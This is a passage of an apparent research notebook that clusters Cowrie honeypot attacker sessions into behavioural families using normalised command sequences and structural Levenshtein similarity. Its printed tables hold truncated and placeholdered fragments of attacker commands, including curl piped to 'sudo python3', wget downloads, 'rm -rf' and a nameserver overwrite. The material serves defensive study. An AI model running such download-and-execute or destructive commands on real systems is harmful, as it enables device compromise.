# Functional Similarity (FS): End-to-End Pipeline

This notebook shows the full FS pipeline for a single dataset (here: `Cowrie.csv`),
**building on top of the FI results**.

The steps are:

1. Set up the project root and import the `fi_fs` module.
2. Run the FI bootstrap (or load the FI table) to obtain FI-unique archetypes.
3. Build a mapping from `fi_hash → canonical sequence` for these archetypes.
4. Compute pairwise FS scores between archetypes using a structural
   Levenshtein-style comparator.
5. Save the FS matrix for reuse (e.g. clustering, evaluation).
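6. Cluster archetypes into FS-based families and inspect their summaries
   (sizes, medoids, consensus structure).
7. Export a Markdown report of the families, draw a Sankey diagram for one
   family, and inspect the original sessions behind that family.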

The goal is to make it easy to see **what FS does** from start to finish,
given FI-unique archetypes as input.


In [1]:
# Bootstrap project root + Python path
import sys, subprocess
from pathlib import Path
import json
import numpy as np
import pandas as pd

import fi_fs

ROOT = Path(subprocess.check_output(
    ["git", "rev-parse", "--show-toplevel"],
    text=True,
).strip())

sys.path[:0] = [str(ROOT / "src")]
print("ROOT project:", ROOT.name)

# FI pipeline pieces

from fi_fs import (
    # FI core
    load_aggregated_csv,
    parse_dataframe_to_triplets,
    apply_aliases,
    apply_placeholders_args_only,
    assert_connectors_preserved,
    alpha_renumber,
    assert_serialisation_deterministic,
    build_fi_dataframe,
    load_alias_map_yaml,

    # FS core
    build_archetypes,
    fs_levenshtein_structural,
    agglomerative_from_fs,
    evaluate_fs_clustering,
    group_indices_from_labels,
    medoid_indices,

    # FS families + visuals
    parse_structured_tokens,
    sankey_from_family_enhanced,

    # Utils (colouring)
    build_fi_colour_map,
    colour_text,
)



PYTHON: cpython 3.12.0
BASHLEX: 0.18
ROOT project: PhD


## Step 1 - FI bootstrap for FS (parse → normalise → FI table)

FS works **on top of** the FI-unique archetypes, so we first (re)run the FI
pipeline for the chosen dataset:

1. **Load aggregated sessions** from `projects/fi_fs/data/processed/<dataset>.csv`.
2. **Parse** each session’s command string with `bashlex` into ordered
   `(op, args, conn)` triplets.
3. **Normalise** the sequences:
   - apply the alias map (canonical operators),
   - replace literals with typed placeholders,
   - α-renumber placeholders for deterministic naming.
4. **Build the FI table**, adding a canonical JSON representation and
   an `fi_hash` (class ID) for each session.

The resulting `fi_df` dataframe is the starting point for FS: it tells us how
many sessions there are in total and how many **FI-unique** behavioural
archetypes we will compare with FS.
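
The normalise-then-hash idea can be sketched on toy data. This is a minimal illustration, not the `fi_fs` implementation: the alias map, the placeholder rules, and the `toy_fi_hash` helper (SHA-256 truncated to 16 hex characters) are all assumptions made for the example.

```python
import hashlib
import json
import re

# Hypothetical alias map and placeholder rules, for illustration only.
ALIASES = {"/bin/busybox": "busybox"}
PLACEHOLDER_RULES = [
    (re.compile(r"^https?://"), "PH_URL"),
    (re.compile(r"^/"), "PH_PATH"),
]


def normalise(seq):
    """Alias operators, then replace literal args with numbered placeholders."""
    counters = {}  # placeholder kind -> last number handed out
    seen = {}      # (kind, literal) -> placeholder, so repeated literals share a name
    out = []
    for op, args, conn in seq:
        new_args = []
        for arg in args:
            kind = next((k for rx, k in PLACEHOLDER_RULES if rx.search(arg)), None)
            if kind is None:
                new_args.append(arg)  # flags such as -q stay literal
                continue
            key = (kind, arg)
            if key not in seen:
                counters[kind] = counters.get(kind, 0) + 1
                seen[key] = f"{kind}_{counters[kind]}"
            new_args.append(seen[key])
        out.append((ALIASES.get(op, op), new_args, conn))
    return out


def toy_fi_hash(seq):
    """Hash a compact JSON serialisation of the normalised sequence."""
    canon = json.dumps(seq, separators=(",", ":"))
    return hashlib.sha256(canon.encode("utf-8")).hexdigest()[:16]


a = normalise([("cd", ["/tmp"], ";"), ("wget", ["-q", "http://a.example/x"], "EOS")])
b = normalise([("cd", ["/var/run"], ";"), ("wget", ["-q", "http://b.example/y"], "EOS")])
print(a)
print(toy_fi_hash(a) == toy_fi_hash(b))
```

Two sessions that differ only in their literal paths and URLs normalise to the same sequence and therefore fall into the same class, which is the property the FI table relies on.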


In [2]:
# FI bootstrap for FS: parse → normalise → FI table

DATASET = "Cowrie.csv"
INPUT = ROOT / "projects" / "fi_fs" / "data" / "processed" / DATASET

agg, stats = load_aggregated_csv(str(INPUT))
print(f"\n--- FI bootstrap for FS ---")
print(f"Dataset: {INPUT.relative_to(ROOT)}")
print(f"Aggregated sessions: {stats['n_sessions']}")

# 1) bashlex → triplets
seqs, parsed_parts, parse_df, problems = parse_dataframe_to_triplets(
    agg,
    progress=True,
    with_diagnostics=True,
)
print(f"Parsed sequences: {len(seqs)}")

# 2) normalisation: aliases → placeholders → α-renumber
alias_map_path = ROOT / "src" / "fi_fs" / "resources" / "alias_map.yaml"
alias_map = load_alias_map_yaml(alias_map_path)
seqs_alias, alias_changes = apply_aliases(seqs, alias_map)
print("Alias changes:", 0 if alias_changes is None else len(alias_changes))

seqs_ph, dbg = apply_placeholders_args_only(
    seqs_alias,
    debug=True,
    preview_changed_first_n_sessions=5,
    sample_per_reason=5,
)
assert_connectors_preserved(seqs_alias, seqs_ph)
seqs_alpha = alpha_renumber(seqs_ph, check_idempotent=True)
print("α-renumbered sessions:", len(seqs_alpha))

# 3) FI table
assert_serialisation_deterministic(seqs_alpha)
fi_df = build_fi_dataframe(agg, seqs_alpha, commands_col="commands_joined")
print(f"Sessions total: {len(fi_df)} | FI-unique: {fi_df['fi_hash'].nunique()}")

fi_df.head(5)



--- FI bootstrap for FS ---
Dataset: projects/fi_fs/data/processed/Cowrie.csv
Aggregated sessions: 63039


Parsing sessions (bashlex): 100%|██████████| 63039/63039 [00:44<00:00, 1416.91it/s]


Parsed sequences: 63039
Alias changes: 163
α-renumbered sessions: 63039
Sessions total: 63039 | FI-unique: 418


Unnamed: 0,session,n_rows,fi_hash,commands_clean,canonical_json
0,00031aeff1a6,5,9c07a2ac9b0db760,sh\nshell\nenable\necho 'nameserver 95.214.27....,"[[""sh"",[],"";""],[""shell"",[],"";""],[""enable"",[],""..."
1,0003e7887230,5,9c07a2ac9b0db760,sh\nshell\nenable\necho 'nameserver 95.214.27....,"[[""sh"",[],"";""],[""shell"",[],"";""],[""enable"",[],""..."
2,0003f10a2103,4,ec2785b8610be5a7,sh\nshell\nenable\ncat /bin/echo || while read...,"[[""sh"",[],"";""],[""shell"",[],"";""],[""enable"",[],""..."
3,0009b3b635ed,1,a34d629a02c11268,cat /bin/echo,"[[""cat"",[""PH_PATH_1""],""EOS""]]"
4,000b5a1e7c5f,1,a5b2e002ac0fcb8a,echo -e '\\x67\\x61\\x79\\x66\\x67\\x74',"[[""echo"",[""-e"",""PH_HEXDATA""],""EOS""]]"


## Step 2 - Build `fi_hash → canonical sequence` map for FS

Next, we construct a mapping from each **FI class** to its canonical
execution sequence:

- `build_archetypes(fi_df)` groups sessions by `fi_hash`,
- selects the canonical sequence for each FI class, and
- returns a dictionary: `fi_hash → [(op, args, conn), ...]`.

This `arche_map` is the input to FS: it tells us *which* behaviour each
FI-unique archetype represents, in a form that the FS comparator can work on.
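
As a rough sketch of what such a map looks like, the snippet below builds one from a few hypothetical rows. It assumes that every session in an FI class carries the same canonical JSON, so the first row seen per `fi_hash` is enough; `toy_build_archetypes` is an illustrative name, not the library function.

```python
import json

# Hypothetical rows shaped like fi_df: (session, n_rows, fi_hash, canonical_json).
rows = [
    ("s1", 1, "aaaa", '[["cat",["PH_PATH_1"],"EOS"]]'),
    ("s2", 1, "aaaa", '[["cat",["PH_PATH_1"],"EOS"]]'),
    ("s3", 1, "bbbb", '[["echo",["-e","PH_HEXDATA"],"EOS"]]'),
]


def toy_build_archetypes(rows):
    """Map each fi_hash to one decoded (op, args, conn) sequence."""
    out = {}
    for _session, _n_rows, fi_hash, canon in rows:
        if fi_hash not in out:  # assumed: one canonical form per class
            out[fi_hash] = [
                (op, tuple(args), conn) for op, args, conn in json.loads(canon)
            ]
    return out


toy_map = toy_build_archetypes(rows)
print(len(toy_map))
print(toy_map["aaaa"])
```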


In [3]:
# Cell 3 - build fi_hash -> triplets map for FS

# Map fi_hash -> triplets (canonical sequences)
arche_map = build_archetypes(fi_df)
print("FI-unique archetypes (by fi_hash):", len(arche_map))


FI-unique archetypes (by fi_hash): 418


## Step 3 - Compute and save the FS matrix (structural Levenshtein)

Using the FI-unique archetypes (`arche_map`), we now:

1. **Compute pairwise FS scores** with a structural Levenshtein-style
   comparator:
   - operates on canonical `(op, args, conn)` triplets,
   - is order-aware and can optionally include connectors in the comparison.

2. **Inspect basic sanity stats** (mean/median/min/max of off-diagonal FS
   values) to check the spread of similarities.

3. **Save the FS matrix** to disk as:

   `projects/fi_fs/data/output/<dataset_name>/FS_eval/NumPy_Arrays/<dataset_name>_FS_Lev_opconn_N{N}.npy`

   where `N` is the number of FI-unique archetypes.
   This `.npy` file can then be reused by clustering/evaluation notebooks
   without recomputing FS.
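
To make the comparator idea concrete, here is a minimal sketch of a Levenshtein-style similarity over `(op, conn)` tokens. The normalisation (one minus distance divided by the longer length) and the choice to ignore arguments are assumptions for illustration; `fs_levenshtein_structural` may weight edits differently.

```python
def edit_distance(a, b):
    """Classic Levenshtein distance between two token sequences."""
    prev = list(range(len(b) + 1))
    for i, x in enumerate(a, start=1):
        curr = [i]
        for j, y in enumerate(b, start=1):
            cost = 0 if x == y else 1
            curr.append(min(prev[j] + 1, curr[j - 1] + 1, prev[j - 1] + cost))
        prev = curr
    return prev[-1]


def toy_fs(seq_a, seq_b, include_connectors=True):
    """Similarity in [0, 1]: 1 - distance / longer length (assumed normalisation)."""
    def tokens(seq):
        return [(op, conn) if include_connectors else op for op, _args, conn in seq]

    ta, tb = tokens(seq_a), tokens(seq_b)
    longest = max(len(ta), len(tb))
    return 1.0 if longest == 0 else 1.0 - edit_distance(ta, tb) / longest


s1 = [("cd", ("PH_PATH_1",), ";"), ("wget", ("PH_URL_1",), ";"), ("chmod", ("777", "PH_PATH_2"), "EOS")]
s2 = [("cd", ("PH_PATH_1",), "||"), ("wget", ("PH_URL_1",), ";"), ("chmod", ("777", "PH_PATH_2"), "EOS")]

print(toy_fs(s1, s2, include_connectors=True))
print(toy_fs(s1, s2, include_connectors=False))
```

The two toy sequences differ only in the first connector, so they score as identical when connectors are ignored and lose one edit out of three when connectors are included.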


In [4]:
from pathlib import Path as _Path

N = len(arche_map)
print(f"Computing structural Levenshtein FS over N={N} FI-unique archetypes...")

labels_lev, FS_lev = fs_levenshtein_structural(
    arche_map,
    include_connectors=True,
    progress=True,
)

# Sanity stats (off-diagonal only)
tri = FS_lev[np.triu_indices_from(FS_lev, 1)]
print(
    f"FS (off-diagonal): n={tri.size}, "
    f"mean={tri.mean():.3f}, median={np.median(tri):.3f}, "
    f"min={tri.min():.3f}, max={tri.max():.3f}"
)

# Output path: data/output/<dataset_name>/FS_eval/NumPy_Arrays/<dataset_name>_FS_Lev_opconn_N{N}.npy
DATASET_NAME = _Path(DATASET).stem
fs_dir = ROOT / "projects" / "fi_fs" / "data" / "output" / DATASET_NAME / "FS_eval" / "NumPy_Arrays"
fs_dir.mkdir(parents=True, exist_ok=True)

fs_filename = f"{DATASET_NAME}_FS_Lev_opconn_N{FS_lev.shape[0]}.npy"
fs_path = fs_dir / fs_filename
np.save(fs_path, FS_lev)

print("Saved FS array to:", fs_path.relative_to(ROOT))


Computing structural Levenshtein FS over N=418 FI-unique archetypes...


Levenshtein-struct (rows):   0%|          | 0/418 [00:00<?, ?it/s]

Levenshtein-struct (pairs):   0%|          | 0/87153 [00:00<?, ?it/s]

FS (off-diagonal): n=87153, mean=0.183, median=0.141, min=0.002, max=1.000
Saved FS array to: projects/fi_fs/data/output/Cowrie/FS_eval/NumPy_Arrays/Cowrie_FS_Lev_opconn_N418.npy


## Step 4 - Align archetypes to FS matrix order

The FS matrix `FS_lev` is indexed in the order returned by the FS
comparator (`labels_lev`, a list of `fi_hash` values).

To make later analysis easier, we:

1. Rebuild the FI-unique representatives (one row per `fi_hash`), keeping
   the session with the largest `n_rows` in each class (ties broken by
   session ID).
2. **Reindex** this table using `labels_lev` so that rows line up exactly
   with the rows/columns of `FS_lev`.
3. Decode `canonical_json` into explicit `(op, args, conn)` sequences and
   store them in a `seq` column.

The resulting `archetypes` dataframe (plus `seqs_unique` and `fi_hashes`)
is now perfectly aligned to the FS matrix and ready for clustering and
family-level analysis.
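
The alignment step amounts to reordering one record per `fi_hash` into the label order of the matrix, and failing loudly if a label is missing or repeated. A small sketch with hypothetical data and a hypothetical helper name:

```python
# Hypothetical labels (matrix order) and representatives (arbitrary order).
labels = ["c3", "a1", "b2"]
representatives = {
    "a1": {"session": "s10", "n_rows": 5},
    "b2": {"session": "s11", "n_rows": 1},
    "c3": {"session": "s12", "n_rows": 2},
}


def align_to_labels(labels, representatives):
    """Return representatives as a list ordered exactly like `labels`."""
    missing = [h for h in labels if h not in representatives]
    if missing:
        raise KeyError(f"No representative for: {missing}")
    if len(set(labels)) != len(labels):
        raise ValueError("labels contains duplicate fi_hash values")
    return [{"fi_hash": h, **representatives[h]} for h in labels]


aligned = align_to_labels(labels, representatives)
print([row["fi_hash"] for row in aligned])
```

Row `i` of the aligned list then describes the same archetype as row and column `i` of the similarity matrix, which is what index-based lookups in later cells assume.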


In [5]:
# Align FI-unique archetypes to FS_lev order (labels_lev)

def decode_canonical(canon_json: str):
    rows = json.loads(canon_json)
    return [(op, tuple(args), conn) for op, args, conn in rows]


# Build FI-unique representatives as before, then reindex by labels_lev
archetypes = (
    fi_df.sort_values(["n_rows", "session"], ascending=[False, True])
         .drop_duplicates("fi_hash", keep="first")
         .set_index("fi_hash")
         .loc[labels_lev]                     # align rows to FS_lev order
         .reset_index()                       # fi_hash back as a column
         [["fi_hash", "session", "n_rows", "canonical_json"]]
)

archetypes["seq"] = archetypes["canonical_json"].map(decode_canonical)

# Convenience globals in FS_lev row order
seqs_unique = archetypes["seq"].tolist()
fi_hashes   = archetypes["fi_hash"].tolist()

print(f"Aligned archetypes to FS matrix order. Rows: {len(archetypes)}")
display(archetypes.head(5))


Aligned archetypes to FS matrix order. Rows: 418


Unnamed: 0,fi_hash,session,n_rows,canonical_json,seq
0,0014c5294a1b8182,b898ce35a477,5,"[[""curl"",[""PH_URL_1""],""|""],[""sudo"",[""python3"",...","[(curl, (PH_URL_1,), |), (sudo, (python3, -, -..."
1,0129d0d0e783bb89,60a7ef53c929,1,"[[""cd"",[""PH_PATH_1""],"";""],[""wget"",[""PH_URL_1""]...","[(cd, (PH_PATH_1,), ;), (wget, (PH_URL_1,), ;)..."
2,021cda85adade07c,1474808cc7d5,1,"[[""rm"",[""-rf"",""PH_PATH_1""],"";""],[""wget"",[""PH_U...","[(rm, (-rf, PH_PATH_1), ;), (wget, (PH_URL_1, ..."
3,02661ba640ad5dbe,0ca5aa140689,1,"[[""cd"",[""PH_PATH_1""],""||""],[""cd"",[""PH_PATH_2""]...","[(cd, (PH_PATH_1,), ||), (cd, (PH_PATH_2,), ||..."
4,02bf42b5f10bf742,69db926faa9d,5,"[[""mkdir"",[""PH_PATH_1""],"";""],[""mount"",[""-o"",""r...","[(mkdir, (PH_PATH_1,), ;), (mount, (-o, remoun..."


## Step 5 - Cluster archetypes into FS families (Agglomerative)

With the FS matrix `FS_lev` in hand, we now cluster the FI-unique
archetypes into **FS families** using Agglomerative clustering:

- The threshold `tau` controls how similar archetypes must be to join a
  family (this notebook uses `tau = 0.75`, pre-set from the FS_Eval notebook
  experiments).
- `agglomerative_from_fs` returns a cluster label per archetype.
- `evaluate_fs_clustering` reports basic summary stats (number of families,
  singletons, etc.).

The resulting labels are stored in `archetypes["family_agg"]` and will be
used for family-level summaries and visualisations.
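
For intuition, threshold-based agglomerative clustering on a similarity matrix can be sketched in a few lines. The average-linkage rule below is an assumption; the linkage used by `agglomerative_from_fs` is not stated in this notebook, and `toy_agglomerative` is a hypothetical name.

```python
def toy_agglomerative(fs, tau):
    """Merge the two most similar clusters until no pair reaches `tau`.

    Cluster similarity is the mean pairwise FS (average linkage, assumed).
    """
    clusters = [[i] for i in range(len(fs))]

    def sim(a, b):
        return sum(fs[i][j] for i in a for j in b) / (len(a) * len(b))

    while len(clusters) > 1:
        best, pair = -1.0, None
        for x in range(len(clusters)):
            for y in range(x + 1, len(clusters)):
                s = sim(clusters[x], clusters[y])
                if s > best:
                    best, pair = s, (x, y)
        if best < tau:
            break  # no remaining pair is similar enough to merge
        x, y = pair
        clusters[x] = clusters[x] + clusters[y]
        del clusters[y]

    labels = [0] * len(fs)
    for cid, members in enumerate(clusters):
        for i in members:
            labels[i] = cid
    return labels


fs = [
    [1.0, 0.9, 0.2, 0.1],
    [0.9, 1.0, 0.3, 0.2],
    [0.2, 0.3, 1.0, 0.8],
    [0.1, 0.2, 0.8, 1.0],
]
print(toy_agglomerative(fs, tau=0.75))
print(toy_agglomerative(fs, tau=0.95))
```

With the lower threshold the four items form two families; with the higher one no pair qualifies and every item stays a singleton.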


In [6]:
# Cluster FS matrix into families (Agglomerative @ tau)

# FS threshold pre-set from FS_Eval notebook experiments
# Adjust accordingly if needed
TAU = 0.75

labels_agg = agglomerative_from_fs(FS_lev, tau=TAU)
archetypes["family_agg"] = labels_agg

stats = evaluate_fs_clustering(
    FS_lev,
    labels_agg,
    tau=TAU,
)

print(f"FS Agglomerative clustering @ tau={TAU}")
print("Families discovered:", stats["n_clusters"])
print("Singleton families:", stats["n_singletons"])

print("\nFamily size distribution (top 10):")
display(pd.Series(labels_agg).value_counts().head(10))

print("\nInternal metrics:")
display(pd.DataFrame([stats]))


FS Agglomerative clustering @ tau=0.75
Families discovered: 188
Singleton families: 110

Family size distribution (top 10):


6      15
35     13
80     13
15     11
68     10
87      9
20      8
34      8
126     7
16      7
Name: count, dtype: int64


Internal metrics:


Unnamed: 0,config,tau,N,n_clusters,n_singletons,max_cluster_size,median_cluster_size,cohesion_min_FS,cohesion_mean_FS,silhouette,calinski_harabasz,davies_bouldin,dunn
0,,0.75,418,188,110,15,1.0,0.666667,0.909371,0.476551,121.550966,0.406154,0.352941


In [7]:
# Optional: explicit groups + medoids from cluster labels

groups = group_indices_from_labels(labels_agg)
medoids = medoid_indices(FS_lev, groups)

print(f"Clusters: {len(groups)}")
print("Example cluster → members (first 5 clusters):")
for gid in sorted(groups.keys())[:5]:
    print(f"  Cluster {gid}: indices {groups[gid][:10]}{' ...' if len(groups[gid]) > 10 else ''}")

print("\nMedoid indices per cluster (first 5):")
for gid in sorted(medoids.keys())[:5]:
    print(f"  Cluster {gid}: medoid index {medoids[gid]}")


Clusters: 188
Example cluster → members (first 5 clusters):
  Cluster 0: indices [286, 316, 358]
  Cluster 1: indices [64, 259, 298, 337]
  Cluster 2: indices [47, 93, 202, 352]
  Cluster 3: indices [113, 225, 271, 330]
  Cluster 4: indices [41, 44, 45, 150, 171, 410]

Medoid indices per cluster (first 5):
  Cluster 0: medoid index 358
  Cluster 1: medoid index 64
  Cluster 2: medoid index 47
  Cluster 3: medoid index 113
  Cluster 4: medoid index 41


## Step 6 - Summarise FS families and members

With cluster labels assigned (`labels_agg`), we now build:

1. **Family-level summaries** via `summarise_families`:
   - one row per FS family,
   - size and basic FS statistics (mean / sd),
   - the medoid index and its `fi_hash`,
   - simple descriptive features such as `top_ops` and
     `consensus_skeleton_pairs`.

2. A **family members table** via `build_family_members_df`:
   - one row per FI-unique archetype,
   - includes its `family_id`, `fi_hash`, and basic metadata.

These two tables (`summ_df` and `family_members_df`) support downstream
inspection, reporting, and visualisation of FS-based behavioural families.
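
Two of the summary fields are easy to illustrate on toy data. The sketch below assumes the medoid is the member with the highest mean FS to the other members of its family, and that `top_ops` counts operators over all member sequences; both definitions are assumptions, not confirmed details of `summarise_families`.

```python
from collections import Counter, defaultdict


def toy_medoids(fs, labels):
    """Group indices by family and pick one medoid per family."""
    groups = defaultdict(list)
    for idx, fam in enumerate(labels):
        groups[fam].append(idx)

    medoids = {}
    for fam, members in groups.items():
        if len(members) == 1:
            medoids[fam] = members[0]
            continue

        def mean_sim(i, members=members):
            return sum(fs[i][j] for j in members if j != i) / (len(members) - 1)

        medoids[fam] = max(members, key=mean_sim)
    return dict(groups), medoids


def top_ops(seqs, members, n=3):
    """Most common operators across the member sequences of one family."""
    counts = Counter(op for i in members for op, _args, _conn in seqs[i])
    return counts.most_common(n)


fs = [
    [1.0, 0.9, 0.8, 0.1],
    [0.9, 1.0, 0.95, 0.1],
    [0.8, 0.95, 1.0, 0.1],
    [0.1, 0.1, 0.1, 1.0],
]
labels = [0, 0, 0, 1]
seqs = [
    [("cd", (), ";"), ("wget", (), "EOS")],
    [("cd", (), ";"), ("wget", (), ";"), ("chmod", (), "EOS")],
    [("cd", (), ";"), ("chmod", (), "EOS")],
    [("echo", (), "EOS")],
]

groups, medoids = toy_medoids(fs, labels)
print(medoids)
print(top_ops(seqs, groups[0], n=1))
```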


In [8]:
# Summarise FS families and build member table

from fi_fs.fs_families import summarise_families, build_family_members_df

# Sanity checks (optional but nice when running standalone)
for name in ["archetypes", "seqs_unique", "FS_lev", "labels_agg"]:
    if name not in globals():
        raise RuntimeError(f"Expected '{name}' to be defined before this cell.")

fi_hashes = archetypes["fi_hash"].tolist()  # aligned with FS_lev rows

# 1) Per-family summaries
summ_df, family_groups, medoids = summarise_families(
    FS=FS_lev,
    seqs_unique=seqs_unique,
    labels=labels_agg,
    fi_hashes=fi_hashes,
)

cols = [
    "family_id",
    "size",
    "mean_FS",
    "sd_FS",
    "medoid_idx",
    "medoid_fi_hash",
    "top_ops",
    "consensus_skeleton_pairs",
]

n_singletons = int((summ_df["size"] == 1).sum())
print(f"\nFamilies total: {len(summ_df)} | Singleton families: {n_singletons}")
print("\nFamily summaries (top 10 by size, then mean_FS):")
display(summ_df[cols].head(10))

# 2) Family members table (one row per archetype with its family label)
family_members_df = build_family_members_df(
    archetypes=archetypes,
    labels=labels_agg,
)

print(
    f"\nfamily_members_df: {len(family_members_df)} rows across "
    f"{family_members_df['family_id'].nunique()} families"
)
display(family_members_df.head(5))



Families total: 188 | Singleton families: 110

Family summaries (top 10 by size, then mean_FS):


Unnamed: 0,family_id,size,mean_FS,sd_FS,medoid_idx,medoid_fi_hash,top_ops,consensus_skeleton_pairs
0,6,15,0.8656,0.0977,27,0e2f33f329730941,"[(cd, 69), (sh, 56), (chmod, 45), (tftp, 30), ...","[(cd, ||), (cd, ||), (cd, ;), (wget, ;), (chmo..."
1,35,13,1.0,0.0,38,153fd69fc12292c2,"[(echo, 13)]","[(echo, EOS)]"
2,80,13,0.9191,0.035,30,0fbbb73a992a1549,"[(cp, 324), (chmod, 228), (cd, 133), (rm, 121)...","[(cd, &&), (rm, &&), (mkdir, &&), (echo, &&), ..."
3,15,11,0.8561,0.0833,336,d23cce656fcbd960,"[(cp, 279), (chmod, 191), (cd, 103), (>, 99), ...","[(mkdir, ;), (mount, ;), (cp, &&), (>, &&), (c..."
4,68,10,1.0,0.0,34,137a14b5e9787ebc,"[(busybox, 10)]","[(busybox, EOS)]"
5,87,9,0.9655,0.0278,187,7fef9be56d5dd1a7,"[(echo, 575), (rm, 63), (chmod, 27), (tftp, 18...","[(enable, ;), (system, ;), (shell, ;), (sh, ;)..."
6,20,8,0.9033,0.0571,73,2b5150c23e9a475b,"[(cd, 40), (cat, 16), (chmod, 12), (wget, 8), ...","[(cat, ;), (cd, ||), (cd, ||), (cd, ||), (cd, ..."
7,34,8,0.8932,0.0644,287,b45528be915a36a4,"[(echo, 40), (>, 24), (rm, 19), (cp, 16), (wge...","[(cat, ;), (rm, ;), (rm, ;), (>, ;), (chmod, |..."
8,56,7,0.9522,0.0321,51,1dcdd0685e28acdb,"[(rm, 25), (tftp, 14), (enable, 7), (system, 7...","[(enable, ;), (system, ;), (shell, ;), (sh, ;)..."
9,126,7,0.9109,0.0516,263,a94b10e419c5761d,"[(echo, 106), (>, 97), (cd, 97), (PH_EXEC_1, 9...","[(>, &&), (cd, ;), (echo, ||), (PH_EXEC_1, ;),..."



family_members_df: 418 rows across 188 families


Unnamed: 0,family_id,archetype_idx,fi_hash,session,n_rows,struct_tokens
0,140,0,0014c5294a1b8182,b898ce35a477,5,"[[""curl"",[""PH_URL_1""],""|""],[""sudo"",[""python3"",..."
1,16,1,0129d0d0e783bb89,60a7ef53c929,1,"[[""cd"",[""PH_PATH_1""],"";""],[""wget"",[""PH_URL_1""]..."
2,18,2,021cda85adade07c,1474808cc7d5,1,"[[""rm"",[""-rf"",""PH_PATH_1""],"";""],[""wget"",[""PH_U..."
3,44,3,02661ba640ad5dbe,0ca5aa140689,1,"[[""cd"",[""PH_PATH_1""],""||""],[""cd"",[""PH_PATH_2""]..."
4,43,4,02bf42b5f10bf742,69db926faa9d,5,"[[""mkdir"",[""PH_PATH_1""],"";""],[""mount"",[""-o"",""r..."


## Step 7 - Export an FS families Markdown report

To make the FS results easy to browse outside the notebook, we generate a
Markdown report with one section per FS family:

- Families are ordered by **size** (largest first), then by **mean_FS**.
- For each family we record:
  - the family ID,
  - size, mean_FS, and sd_FS,
  - the medoid archetype (`fi_hash`, session id, `n_rows`),
  - the consensus `(op, conn)` skeleton,
  - the top operators observed in the family.

We also list up to the first 5 member archetypes (with `fi_hash`,
`session`, and `n_rows`) for a quick textual overview.

The report is written to:

`projects/fi_fs/data/output/<dataset_name>/FS_eval/<dataset_name>_FS_families_report.md`

and can be opened directly in any Markdown viewer or included as an
appendix in documentation.
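
The ordering and section layout can be sketched independently of the dataframes. The snippet below uses three rows taken from the summary table above and a hypothetical `render_report` helper; it covers only the heading and the size line, not the medoid or member details.

```python
# Three family summaries copied from the table above; field names mirror its columns.
families = [
    {"family_id": 35, "size": 13, "mean_FS": 1.0, "sd_FS": 0.0},
    {"family_id": 6, "size": 15, "mean_FS": 0.8656, "sd_FS": 0.0977},
    {"family_id": 80, "size": 13, "mean_FS": 0.9191, "sd_FS": 0.035},
]


def render_report(families):
    """Return Markdown text with one section per family, largest first."""
    ordered = sorted(families, key=lambda f: (-f["size"], -f["mean_FS"]))
    lines = ["# FS Families Report", ""]
    for fam in ordered:
        lines.append(f"## Family {fam['family_id']}")
        lines.append("")
        lines.append(
            f"Size: **{fam['size']}**, mean_FS: **{fam['mean_FS']:.3f}**, "
            f"sd_FS: **{fam['sd_FS']:.3f}**"
        )
        lines.append("")
    return "\n".join(lines)


report = render_report(families)
print(report)
```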


In [9]:
# Create a Markdown report with one section per family

from pathlib import Path as _Path

# Detect a commands column on fi_df for medoid snippet lookups
CMD_COL_CANDIDATES = ["commands_clean", "commands_joined", "commands"]
cmd_col = next((c for c in CMD_COL_CANDIDATES if c in fi_df.columns), None)
if cmd_col is None:
    raise KeyError(
        f"No commands column found in fi_df. "
        f"Looked for: {CMD_COL_CANDIDATES}. "
        f"Got: {list(fi_df.columns)}"
    )

lines = ["# FS Families Report\n"]
fam_order = (
    summ_df.sort_values(["size", "mean_FS"], ascending=[False, False])["family_id"]
           .tolist()
)

for fid in fam_order:
    row = summ_df.loc[summ_df["family_id"] == fid].iloc[0]
    idxs = family_groups[fid]
    medoid_idx = int(row["medoid_idx"])
    med = archetypes.iloc[medoid_idx]

    # Medoid look-up from fi_df (original FI table)
    med_sess = str(med.session)
    med_hash = med.fi_hash
    med_rows = fi_df.loc[
        (fi_df["session"].astype(str) == med_sess) &
        (fi_df["fi_hash"] == med_hash),
        cmd_col,
    ]

    if not med_rows.empty:
        med_cmds = str(med_rows.iloc[0])
        max_len = 260
        if len(med_cmds) > max_len:
            med_cmds_snippet = med_cmds[:max_len] + " ..."
        else:
            med_cmds_snippet = med_cmds
    else:
        med_cmds_snippet = "(commands not found in fi_df)"

    lines.append(
        f"## Family {fid}\n\n"
        f"Size: **{row['size']}**, mean_FS: **{row['mean_FS']:.3f}**, "
        f"sd_FS: **{row['sd_FS']:.3f}**  \n"
        f"Medoid: `fi_hash={med.fi_hash}` "
        f"(session `{med.session}`, n_rows={int(med.n_rows)})  \n\n"
        f"**Medoid commands (snippet):**\n\n"
        f"```bash\n{med_cmds_snippet}\n```\n\n"
        f"Consensus (op, conn) pairs:\n\n"
        f"```python\n{row['consensus_skeleton_pairs']}\n```\n\n"
        f"Top operators: {row['top_ops']}\n"
    )

    # Members as a proper Markdown table instead of a code block
    members = (
        archetypes.loc[idxs, ["fi_hash", "session", "n_rows"]]
        .head(5)
        .reset_index(drop=True)
    )
    members_md = members.to_markdown(index=False)

    lines.append("**Members (first 5):**\n\n" + members_md + "\n")

md_text = "\n".join(lines)

DATASET_NAME = _Path(DATASET).stem
report_dir = ROOT / "projects" / "fi_fs" / "data" / "output" / DATASET_NAME / "FS_eval"
report_dir.mkdir(parents=True, exist_ok=True)

report_path = report_dir / f"{DATASET_NAME}_FS_families_report.md"
with open(report_path, "w", encoding="utf-8") as f:
    f.write(md_text)

print("Wrote FS families report to:", report_path.relative_to(ROOT))


Wrote FS families report to: projects/fi_fs/data/output/Cowrie/FS_eval/Cowrie_FS_families_report.md


## Step 8 - Sankey visualisation for a chosen FS family

To get an intuitive view of **how** commands vary within a single FS family,
we can draw a Sankey diagram for one `family_id`:

1. Select a family (`FAM`) and collect its `struct_tokens` from
   `family_members_df`.
2. Decode these into structured sequences for all member archetypes.
3. Use `sankey_from_family_enhanced` to build a flow diagram where:
   - the backbone path reflects a consensus sequence (WLCS backbone),
   - branches represent common variants at different positions,
   - edge widths indicate how often each variant occurs.

The printed `variant_detail` data gives a textual breakdown of the same
information (variants per “gap”), complementing the visualisation.
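
The backbone-and-gaps idea can be illustrated with a plain longest common subsequence between two token lists. This is a simplified stand-in: the notebook's backbone is a weighted LCS over a whole family, whereas the hypothetical helpers below handle two sequences and no weights.

```python
def lcs(a, b):
    """Longest common subsequence of two token lists (dynamic programming)."""
    m, n = len(a), len(b)
    table = [[0] * (n + 1) for _ in range(m + 1)]
    for i in range(m - 1, -1, -1):
        for j in range(n - 1, -1, -1):
            if a[i] == b[j]:
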